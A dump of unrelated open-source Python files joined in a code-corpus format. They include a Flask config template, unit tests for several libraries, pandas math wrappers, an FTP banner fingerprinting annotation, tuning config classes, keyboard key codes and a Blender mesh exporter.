"""
import os
_basedir = os.path.abspath(os.path.dirname(__file__))
DEBUG = False
ADMINS = frozenset(['<EMAIL>'])
SECRET_KEY = ''
SQLALCHEMY_DATABASE_URI = 'DATABASE://USERNAME:PASSWORD@localhost/YOUR_DB_NAME'
DATABASE_CONNECT_OPTIONS = {}
CSRF_ENABLED = True
CSRF_SESSION_KEY = ""
# Customize and add the blow if you'd like to use recaptcha. SSL is enabled
# by default and this is recaptcha v2: tap "I'm not a robot" checkbox instead
# of answering a riddle.
# Please see: https://www.google.com/recaptcha
RECAPTCHA_DATA_ATTRS = {'theme': 'light'}
RECAPTCHA_PUBLIC_KEY = 'YOUR KEY HERE'
RECAPTCHA_PRIVATE_KEY = 'YOUR PRIVATE KEY HERE'
BRAND = "reddit"
DOMAIN = "YOUR_DOMAIN_HERE"
ROOT_URL = "http://YOUR_URL_HERE"
STATIC_ROOT = "/path/to/your/static/root/"
STATIC_URL = ROOT_URL + "/static/"
|
flask_table/__init__.py | nullptrT/flask_table | 215 | 12775274 | from .table import Table, create_table
from .columns import (
Col,
BoolCol,
DateCol,
DatetimeCol,
LinkCol,
ButtonCol,
OptCol,
NestedTableCol,
BoolNaCol,
)
|
tests/test_parser.py | kittinan/twitter_media_downloader | 161 | 12775305 | # coding: utf-8
"""
Unit tests for the parser module.
"""
from ..src.parser import parse_tweet
# pylint: disable=old-style-class,too-few-public-methods
class Struct:
"""Basic class to convert a struct to a dict."""
def __init__(self, **entries):
self.__dict__.update(entries)
USER = Struct(**{
'id_str': '456789',
'name': 'Super user',
'screen_name': 'superuser123',
})
TWEET = Struct(**{
'id_str': '123456',
'created_at': '2019-06-24 20:19:35',
'full_text': 'Hello world!',
'entities': {
'urls': [
{'expanded_url': 'https://instagram.com/test'},
{'expanded_url': 'https://www.google.com'},
{'expanded_url': 'https://periscope.tv/test'}
]
},
'user': USER,
'extended_entities': {
'media': [
{
'video_info': {
'variants': [
{
'bitrate': 123,
'url': 'video_123'
},
{
'bitrate': 789,
'url': 'video_789'
}
]
}
},
{
'media_url_https': 'video_789/video_thumb',
'sizes': ['thumb', 'large']
},
{
'media_url_https': 'my_image',
'sizes': ['thumb', 'large']
},
{
'media_url_https': 'other_image',
'sizes': ['thumb', 'medium']
}
]
}
})
TEXT_TWEET = Struct(**{
'id_str': '123456',
'created_at': '2019-06-24 20:19:35',
'user': USER,
'full_text': 'Hello world!'
})
RETWEET = Struct(**{
'id_str': '789',
'created_at': '2019-06-22 12:12:12',
'user': USER,
'retweeted_status': TWEET
})
def test_tweet():
"""Ensure that tweets with images and video are properly parsed."""
results = {
'tweets': 0,
'retweets': 0,
'media': []
}
parse_tweet(TWEET, True, 'large', results)
assert results['tweets'] == 1
assert results['retweets'] == 0
assert len(results['media']) == 1
assert results['media'][0]['tweet_id'] == '123456'
assert results['media'][0]['original_tweet_id'] == '123456'
assert results['media'][0]['text'] == ''
assert results['media'][0]['videos'] == ['video_789']
assert results['media'][0]['images'] == ['my_image:large', 'other_image']
assert results['media'][0]['urls']['periscope'] == ['https://periscope.tv/test']
assert results['media'][0]['urls']['instagram'] == ['https://instagram.com/test']
assert results['media'][0]['urls']['others'] == ['https://www.google.com']
def test_text_tweet():
"""Ensure that text tweets are properly parsed."""
results = {
'tweets': 0,
'retweets': 0,
'media': []
}
parse_tweet(TEXT_TWEET, True, 'large', results)
assert results['tweets'] == 1
assert results['retweets'] == 0
assert len(results['media']) == 1
assert results['media'][0]['tweet_id'] == '123456'
assert results['media'][0]['original_tweet_id'] == '123456'
assert results['media'][0]['text'] == 'Hello world!'
def test_retweet():
"""Ensure that retweets are properly parsed when enabled."""
results = {
'tweets': 0,
'retweets': 0,
'media': []
}
parse_tweet(RETWEET, True, 'large', results)
assert results['tweets'] == 0
assert results['retweets'] == 1
assert len(results['media']) == 1
assert results['media'][0]['tweet_id'] == '789'
assert results['media'][0]['original_tweet_id'] == '123456'
def test_retweet_disabled():
"""Ensure that retweets are not treated as such when they are disabled."""
results = {
'tweets': 0,
'retweets': 0,
'media': []
}
parse_tweet(RETWEET, False, 'large', results)
assert results['tweets'] == 1
assert results['retweets'] == 0
assert len(results['media']) == 1
assert results['media'][0]['tweet_id'] == '789'
assert results['media'][0]['original_tweet_id'] == '789'
|
optimus/engines/pandas/functions.py | ironmussa/Optimus | 1,045 | 12775311 | <reponame>ironmussa/Optimus
import numpy as np
import pandas as pd
from optimus.engines.base.pandas.functions import PandasBaseFunctions
from optimus.engines.base.dataframe.functions import DataFrameBaseFunctions
class PandasFunctions(PandasBaseFunctions, DataFrameBaseFunctions):
_engine = pd
@staticmethod
def dask_to_compatible(dfd):
from optimus.helpers.converter import dask_dataframe_to_pandas
return dask_dataframe_to_pandas(dfd)
@staticmethod
def df_concat(df_list):
return pd.concat(df_list, axis=0, ignore_index=True)
@staticmethod
def new_df(*args, **kwargs):
return pd.DataFrame(*args, **kwargs)
def count_zeros(self, series, *args):
return int((self.to_float(series).values == 0).sum())
def kurtosis(self, series):
# use scipy to match function from dask.array.stats
from scipy.stats import kurtosis
return kurtosis(self.to_float(series.dropna()))
def skew(self, series):
# use scipy to match function from dask.array.stats
from scipy.stats import skew
return skew(self.to_float(series.dropna()))
def exp(self, series):
return np.exp(self.to_float(series))
def sqrt(self, series):
return np.sqrt(self.to_float(series))
def reciprocal(self, series):
return np.reciprocal(self.to_float(series))
def radians(self, series):
return np.radians(self.to_float(series))
def degrees(self, series):
return np.degrees(self.to_float(series))
def ln(self, series):
return np.log(self.to_float(series))
def log(self, series, base=10):
return np.log(self.to_float(series)) / np.log(base)
def sin(self, series):
return np.sin(self.to_float(series))
def cos(self, series):
return np.cos(self.to_float(series))
def tan(self, series):
return np.tan(self.to_float(series))
def asin(self, series):
return np.arcsin(self.to_float(series))
def acos(self, series):
return np.arccos(self.to_float(series))
def atan(self, series):
return np.arctan(self.to_float(series))
def sinh(self, series):
return np.arcsinh(self.to_float(series))
def cosh(self, series):
return np.cosh(self.to_float(series))
def tanh(self, series):
return np.tanh(self.to_float(series))
def asinh(self, series):
return np.arcsinh(self.to_float(series))
def acosh(self, series):
return np.arccosh(self.to_float(series))
def atanh(self, series):
return np.arctanh(self.to_float(series))
def floor(self, series):
return np.floor(self.to_float(series))
def ceil(self, series):
return np.ceil(self.to_float(series))
def normalize_chars(self, series):
return series.str.normalize("NFKD").str.encode('ascii', errors='ignore').str.decode('utf8')
|
iexfinance/tests/stocks/test_market_movers.py | jto-d/iexfinance | 653 | 12775350 | <filename>iexfinance/tests/stocks/test_market_movers.py
import pandas as pd
import pytest
from iexfinance.stocks import (
get_market_gainers,
get_market_iex_percent,
get_market_iex_volume,
get_market_losers,
get_market_most_active,
)
class TestMarketMovers(object):
def test_market_gainers(self):
li = get_market_gainers()
assert isinstance(li, pd.DataFrame)
assert len(li) == pytest.approx(10, 1)
def test_market_losers(self):
li = get_market_losers()
assert isinstance(li, pd.DataFrame)
assert len(li) == pytest.approx(10, 1)
def test_market_most_active(self):
li = get_market_most_active()
assert isinstance(li, pd.DataFrame)
assert len(li) == pytest.approx(10, 1)
def test_market_iex_volume(self):
li = get_market_iex_volume()
assert isinstance(li, pd.DataFrame)
assert len(li) == pytest.approx(10, 1)
def test_market_iex_percent(self):
li = get_market_iex_percent()
assert isinstance(li, pd.DataFrame)
assert len(li) == pytest.approx(10, 1)
|
ztag/annotations/FtpKebi.py | justinbastress/ztag | 107 | 12775353 | <gh_stars>100-1000
import re
from ztag.annotation import Annotation
from ztag.annotation import OperatingSystem
from ztag import protocols
import ztag.test
class FtpKebi(Annotation):
protocol = protocols.FTP
subprotocol = protocols.FTP.BANNER
port = None
impl_re = re.compile("^220- Kebi FTP Server", re.IGNORECASE)
version_re = re.compile("\(Version (\d+(?:\.\d+)*)\)", re.IGNORECASE)
def process(self, obj, meta):
banner = obj["banner"]
if self.impl_re.search(banner):
meta.local_metadata.product = "Kebi Ftpd"
match = self.version_re.search(banner)
if match:
meta.local_metadata.version = match.group(1)
return meta
""" Tests
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 SINN \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Easy FTP\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"""
|
sp_api/auth/credentials.py | lionsdigitalsolutions/python-amazon-sp-api | 213 | 12775374 | import os
class Credentials:
def __init__(self, refresh_token, credentials):
self.client_id = credentials.lwa_app_id
self.client_secret = credentials.lwa_client_secret
self.refresh_token = refresh_token or credentials.refresh_token
|
tests.py | qiang123/regal | 432 | 12775383 | from unittest import TestCase
from regal import BaseInfo
from regal.grouping import GroupAlgorithm
from regal.check_interface import AlgorithmABC
# Run Method: python -m unittest -v tests.py
class TestBaseInfoInitial(TestCase):
def test_empty_info(self):
ab = BaseInfo('', '', '')
with self.assertRaises(AttributeError):
ab.grouping()
def test_empty_info_version_host_isdict(self):
ab = BaseInfo({}, '', '')
self.assertIsNotNone(ab.grouping())
def test_info_errortype(self):
ab = BaseInfo({}, '1', 'sds')
self.assertIsNotNone(ab.grouping())
class TestGroupingResult(TestCase):
ver = {
'ver1': '1.1.1.1,2.2.2.2,3.3.3.3,4.4.4.4,5.1.1.1,6.2.2.2,7.3.3.3,8.4.4.4'}
combine_num = 4
def test_combine_num(self):
ab = BaseInfo(
self.ver,
self.combine_num
)
instance_combine_num = ab.grouping().result[0][1]
self.assertEqual(len(instance_combine_num[1:-1][0]), self.combine_num)
def test_schedule_num(self):
schedule_num = 2
ab = BaseInfo(self.ver, self.combine_num, schedule_num)
instance_combine_num = ab.grouping().result[0][1]
self.assertEqual(len(instance_combine_num[0][0].split(',')), schedule_num)
class TestInstance(TestCase):
def test_algorithm_instance(self):
self.assertIsInstance(GroupAlgorithm(), AlgorithmABC)
|
neural_compressor/ux/utils/workload/tuning.py | intel/neural-compressor | 172 | 12775409 | # -*- coding: utf-8 -*-
# Copyright (c) 2021-2022 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Configuration tuning module."""
from typing import Any, Dict, List, Optional, Union
from neural_compressor.ux.utils.exceptions import ClientErrorException
from neural_compressor.ux.utils.json_serializer import JsonSerializer
from neural_compressor.ux.utils.utils import (
parse_bool_value,
parse_to_float_list,
parse_to_string_list,
)
class Strategy(JsonSerializer):
"""Configuration Strategy class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize configuration Strategy class."""
super().__init__()
# [Required] One of neural_compressor.strategy.STRATEGIES
self.name: str = data.get("name", "basic")
self.sigopt_api_token: Optional[str] = data.get("sigopt_api_token", None)
self.accuracy_weight: Optional[float] = data.get("accuracy_weight", None)
self.latency_weight: Optional[float] = data.get("latency_weight", None)
class MultiObjectives(JsonSerializer):
"""Configuration MultiObjectives class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize configuration MultiObjectives class."""
super().__init__()
self._objective: List[str] = data.get("objective", [])
self._weight: List[float] = data.get("weight", [])
@property
def objective(self) -> List[str]:
"""Get objectives."""
return self._objective
@objective.setter
def objective(self, value: Union[None, str, List[str]]) -> None:
"""Set inputs value."""
self._objective = parse_to_string_list(value)
@property
def weight(self) -> List[float]:
"""Get weights."""
return self._weight
@weight.setter
def weight(self, value: Union[None, float, List[float]]) -> None:
"""Set weights value."""
self._weight = parse_to_float_list(value)
class AccCriterion(JsonSerializer):
"""Configuration AccCriterion class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize configuration AccCriterion class."""
super().__init__()
self.relative: Optional[float] = data.get(
"relative",
None,
) # [Optional] (INT8-FP32)/FP32
self.absolute: Optional[float] = data.get(
"absolute",
None,
) # [Optional] INT8-FP32
# Set default accuracy criterion to relative
if self.relative is None and self.absolute is None:
self.relative = 0.1
class ExitPolicy(JsonSerializer):
"""Configuration ExitPolicy class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize Configuration ExitPolicy class."""
super().__init__()
self.timeout: Optional[int] = data.get("timeout", None)
self.max_trials: Optional[int] = data.get("max_trials", None)
self.performance_only: Optional[bool] = data.get("performance_only", None)
class Workspace(JsonSerializer):
"""Configuration Workspace class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize Configuration Workspace class."""
super().__init__()
self.path: Optional[str] = data.get("path", None) # [Optional]
self.resume: Optional[str] = data.get("resume", None) # [Optional]
class Tuning(JsonSerializer):
"""Configuration Tuning class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize Configuration Tuning class."""
super().__init__()
self.strategy: Strategy = Strategy()
if data.get("strategy"):
self.strategy = Strategy(data.get("strategy", {}))
self.accuracy_criterion: AccCriterion = AccCriterion(
data.get("accuracy_criterion", {}),
)
self.multi_objectives: Optional[MultiObjectives] = None
if data.get("multi_objectives"):
self.multi_objectives = MultiObjectives(data.get("multi_objectives", {}))
self.exit_policy: Optional[ExitPolicy] = None
if data.get("exit_policy"):
self.exit_policy = ExitPolicy(data.get("exit_policy", {}))
self.random_seed: Optional[int] = data.get("random_seed", None)
self.tensorboard: Optional[bool] = data.get("tensorboard", None)
self.workspace: Optional[Workspace] = None
if data.get("workspace", {}):
self.workspace = Workspace(data.get("workspace", {}))
def set_timeout(self, timeout: int) -> None:
"""Update tuning timeout in config."""
try:
timeout = int(timeout)
if timeout < 0:
raise ValueError
except ValueError:
raise ClientErrorException(
"The timeout value is not valid. " "Timeout should be non negative integer.",
)
if self.exit_policy:
self.exit_policy.timeout = timeout
else:
self.exit_policy = ExitPolicy({"timeout": timeout})
def set_max_trials(self, max_trials: int) -> None:
"""Update max tuning trials in config."""
try:
max_trials = int(max_trials)
if max_trials < 0:
raise ValueError
except ValueError:
raise ClientErrorException(
"The max trials value is not valid. " "Max trials should be non negative integer.",
)
if self.exit_policy:
self.exit_policy.max_trials = max_trials
else:
self.exit_policy = ExitPolicy({"max_trials": max_trials})
def set_performance_only(self, performance_only: Any) -> None:
"""Update performance only flag in config."""
try:
performance_only = parse_bool_value(performance_only)
except ValueError:
raise ClientErrorException(
"The performance_only flag value is not valid. "
"Performance_ony should be a boolean.",
)
if self.exit_policy:
self.exit_policy.performance_only = performance_only
else:
self.exit_policy = ExitPolicy({"performance_only": performance_only})
def set_random_seed(self, random_seed: int) -> None:
"""Update random seed value in config."""
try:
random_seed = int(random_seed)
except ValueError:
raise ClientErrorException(
"The random seed value is not valid. " "Random seed should be an integer.",
)
self.random_seed = random_seed
def set_workspace(self, path: str) -> None:
"""Update tuning workspace path in config."""
if self.workspace is None:
self.workspace = Workspace()
self.workspace.path = path
|
tests/domain/book/test_book.py | tamanobi/dddpy | 170 | 12775422 | import pytest
from dddpy.domain.book import Book, Isbn
class TestBook:
def test_constructor_should_create_instance(self):
book = Book(
id="book_01",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
)
assert book.id == "book_01"
assert book.isbn == Isbn("978-0321125217")
assert (
book.title
== "Domain-Driven Design: Tackling Complexity in the Heart of Softwares"
)
assert book.page == 560
assert book.read_page == 0
def test_book_entity_should_be_identified_by_id(self):
book_1 = Book(
id="book_01",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
read_page=50,
)
book_2 = Book(
id="book_01",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
read_page=120,
)
book_3 = Book(
id="book_02",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
read_page=50,
)
assert book_1 == book_2
assert book_1 != book_3
@pytest.mark.parametrize(
"read_page",
[
(0),
(1),
(320),
],
)
def test_read_page_setter_should_update_value(self, read_page):
book = Book(
id="book_01",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
)
book.read_page = read_page
assert book.read_page == read_page
@pytest.mark.parametrize(
"read_page, expected",
[
(0, False),
(559, False),
(560, True),
],
)
def test_is_already_read_should_true_when_read_page_has_reached_last_page(
self, read_page, expected
):
book = Book(
id="book_01",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
)
book.read_page = read_page
assert book.is_already_read() == expected
|
lackey/KeyCodes.py | Inobitec/lackey | 599 | 12775456 | <reponame>Inobitec/lackey
class Button():
LEFT = 0
CENTER = 1
RIGHT = 2
class Key():
""" Key codes for InputEmulation.Keyboard object.
Can be entered directly or concatenated with an existing string, e.g. ``type(Key.TAB)`` """
ENTER = "{ENTER}"
ESC = "{ESC}"
BACKSPACE = "{BACKSPACE}"
DELETE = "{DELETE}"
F1 = "{F1}"
F2 = "{F2}"
F3 = "{F3}"
F4 = "{F4}"
F5 = "{F5}"
F6 = "{F6}"
F7 = "{F7}"
F8 = "{F8}"
F9 = "{F9}"
F10 = "{F10}"
F11 = "{F11}"
F12 = "{F12}"
F13 = "{F13}"
F14 = "{F14}"
F15 = "{F15}"
F16 = "{F16}"
HOME = "{HOME}"
END = "{END}"
LEFT = "{LEFT}"
RIGHT = "{RIGHT}"
DOWN = "{DOWN}"
UP = "{UP}"
PAGE_DOWN = "{PAGE_DOWN}"
PAGE_UP = "{PAGE_UP}"
TAB = "{TAB}"
CAPS_LOCK = "{CAPS_LOCK}"
NUM_LOCK = "{NUM_LOCK}"
SCROLL_LOCK = "{SCROLL_LOCK}"
INSERT = "{INSERT}"
SPACE = "{SPACE}"
PRINTSCREEN = "{PRINTSCREEN}"
ALT = "{ALT}"
CMD = "{CMD}"
CTRL = "{CTRL}"
META = "{META}"
SHIFT = "{SHIFT}"
WIN = "{WIN}"
PAUSE = "{PAUSE}"
NUM0 = "{NUM0}"
NUM1 = "{NUM1}"
NUM2 = "{NUM2}"
NUM3 = "{NUM3}"
NUM4 = "{NUM4}"
NUM5 = "{NUM5}"
NUM6 = "{NUM6}"
NUM7 = "{NUM7}"
NUM8 = "{NUM8}"
NUM9 = "{NUM9}"
SEPARATOR = "{SEPARATOR}"
ADD = "{ADD}"
MINUS = "{MINUS}"
MULTIPLY = "{MULTIPLY}"
DIVIDE = "{DIVIDE}"
class KeyModifier():
""" Can be used with type() to modify another key, e.g. ``type(Key.DELETE, Key.CTRL+Key.ALT)`` """
CTRL = "{CTRL}"
SHIFT = "{SHIFT}"
ALT = "{ALT}"
META = "{META}"
CMD = "{CMD}"
WIN = "{WIN}" |
Blender Export/objc-export-2.5/objc_blend_2.5.6/export_objc.py | JavaZava/iOS-OpenGLES-Stuff | 199 | 12775463 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import os
import time
import shutil
import bpy
import mathutils
def write_objc(filepath,context):
out = open(filepath, 'w')
current_scene = bpy.context.scene
objs = current_scene.objects
#i know there has to be an easier way to do this, but i'm too lazy to look it up
for next_obj in objs:
if next_obj.type == 'MESH':
mesh = next_obj
print("Writing Object")
for i in current_scene.objects:
i.select = False #deselect all objects
mesh.select = True
current_scene.objects.active = mesh #set the mesh object to current
bpy.ops.object.mode_set(mode='EDIT') #Operators
bpy.ops.mesh.select_all(action='SELECT')#select all the face/vertex/edge
bpy.ops.mesh.quads_convert_to_tris() #Operators
current_scene.update()
bpy.ops.object.mode_set(mode='OBJECT') # set it in object
mesh = mesh.data
objectname = mesh.name
basename = objectname.capitalize()
out.write('#import "OpenGLCommon.h"\n\n\n')
if len(mesh.uv_textures) > 0:
out.write('static const TexturedVertexData3D %sVertexData[] = {\n' % basename)
#for face in uv: #loop through the faces
uv_layer = mesh.active_uv_texture
for face in mesh.faces:
faceUV = uv_layer.data[face.index]
i=0
for index in face.vertices:
if len(face.vertices) == 3:
vert = mesh.vertices[index]
out.write('\t{/*v:*/{%f, %f, %f}, ' % (vert.co.x, vert.co.y, vert.co.z) )
out.write('/*n:*/{%f, %f, %f}, ' % (vert.normal.x, vert.normal.y, vert.normal.z))
out.write('/*t:*/{%f, %f}' % ( faceUV.uv[i][0], faceUV.uv[i][1] ) )
out.write('},\n')
i+=1
out.write('};\n\n')
elif len(mesh.vertex_colors) > 0:
out.write('static const ColoredVertexData3D %sVertexData[] = {\n' % basename)
color_layer = mesh.active_vertex_color
for face in mesh.faces:
if len(face.vertices) == 3:
faceC = color_layer.data[face.index]
i=0
for index in face.vertices:
vert = mesh.vertices[index]
out.write('\t{/*v:*/{%f, %f, %f}, ' % (vert.co.x, vert.co.y, vert.co.z) )
out.write('/*n:*/{%f, %f, %f}, ' % (vert.normal.x, vert.normal.y, vert.normal.z))
out.write('/*c:*/{%f, %f, %f, %f}' % ( faceC.color1[i], faceC.color2[i], faceC.color3[i], faceC.color4[i]) )
out.write('},\n')
i+=1
out.write('};\n\n')
else:
out.write
out.write('static const VertexData3D %sVertexData[] = {\n' % basename)
for face in mesh.faces:
if len(face.vertices) == 3:
for index in face.vertices:
vert = mesh.vertices[index]
out.write('\t{/*v:*/{%f, %f, %f}, ' % (vert.co.x, vert.co.y, vert.co.z) )
out.write('/*n:*/{%f, %f, %f} ' % (vert.normal.x, vert.normal.y, vert.normal.z))
out.write('},\n')
out.write('};\n\n')
#if editmode: Window.EditMode(1)
out.write('#define k%sNumberOfVertices\t%i\n' % (basename, len(mesh.faces) * 3) )
out.write('// Drawing Code:\n')
out.write('// glEnableClientState(GL_VERTEX_ARRAY);\n')
if len(mesh.uv_textures) > 0:
out.write('// glEnableClientState(GL_TEXTURE_COORD_ARRAY);\n')
elif len(mesh.vertex_colors) > 0:
out.write('// glEnableClientState(GL_COLOR_ARRAY);\n')
out.write('// glEnable(GL_COLOR_MATERIAL)\n')
out.write('// glEnableClientState(GL_NORMAL_ARRAY);\n')
out.write('// glVertexPointer(3, GL_FLOAT, sizeof(')
if len(mesh.uv_textures) > 0:
out.write('TexturedVertexData3D')
elif len(mesh.vertex_colors) > 0:
out.write('ColoredVertexData3D')
else:
out.write('VertexData3D')
out.write('), &%sVertexData[0].vertex);\n' % basename)
out.write('// glNormalPointer(GL_FLOAT, sizeof(')
if len(mesh.uv_textures) > 0:
out.write('TexturedVertexData3D')
elif len(mesh.vertex_colors) > 0:
out.write('ColoredVertexData3D')
else:
out.write('VertexData3D')
out.write('), &%sVertexData[0].normal);\n' % basename)
if len(mesh.uv_textures) > 0:
out.write('// glTexCoordPointer(2, GL_FLOAT, sizeof(TexturedVertexData3D), &%sVertexData[0].texCoord);\n' % basename)
elif len(mesh.vertex_colors) > 0:
out.write('// glColorPointer(4, GL_FLOAT, sizeof(ColoredVertexData3D), &%sVertexData[0].color);\n' % basename)
out.write('// glDrawArrays(GL_TRIANGLES, 0, k%sNumberOfVertices);\n' % basename)
out.write('// glDisableClientState(GL_VERTEX_ARRAY);\n')
if len(mesh.uv_textures) > 0:
out.write('// glDisableClientState(GL_TEXTURE_COORD_ARRAY);\n')
elif len(mesh.vertex_colors) > 0:
out.write('// glDisableClientState(GL_NORMAL_ARRAY);\n')
out.write('// glDisable(GL_COLOR_MATERIAL);\n')
out.write('// glDisableClientState(GL_NORMAL_ARRAY);\n\n\n')
out.close()
def save(operator, context, filepath="",
use_triangles=False,
use_edges=True,
use_normals=False,
use_hq_normals=False,
use_uvs=True,
use_materials=True,
copy_images=False,
use_modifiers=True,
use_rotate_x90=True,
use_blen_objects=True,
group_by_object=False,
group_by_material=False,
keep_vertex_order=False,
use_vertex_groups=False,
use_nurbs=True,
use_selection=True,
use_all_scenes=False,
use_animation=False,
):
write_objc(filepath,context)
return {'FINISHED'}
|
src/ydata_quality/utils/modelling.py | poga/ydata-quality | 242 | 12775477 | """
Utilities based on building baseline machine learning models.
"""
from typing import Union, Optional
from pandas import DataFrame, Series
from numpy import mean, tile, empty, std, square, sqrt, log as nplog, reciprocal
from scipy.stats import boxcox, normaltest, mode
from sklearn.compose import ColumnTransformer
from sklearn.exceptions import ConvergenceWarning, DataConversionWarning
from sklearn.impute import SimpleImputer
from sklearn.linear_model import LinearRegression, LogisticRegression
from sklearn.metrics import mean_squared_error, roc_auc_score
from sklearn.mixture import GaussianMixture
from sklearn.model_selection import train_test_split
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import (FunctionTransformer, OneHotEncoder,
RobustScaler, StandardScaler,
label_binarize)
from sklearn.utils._testing import ignore_warnings
from .auxiliary import infer_dtypes
from .enum import PredictionTask
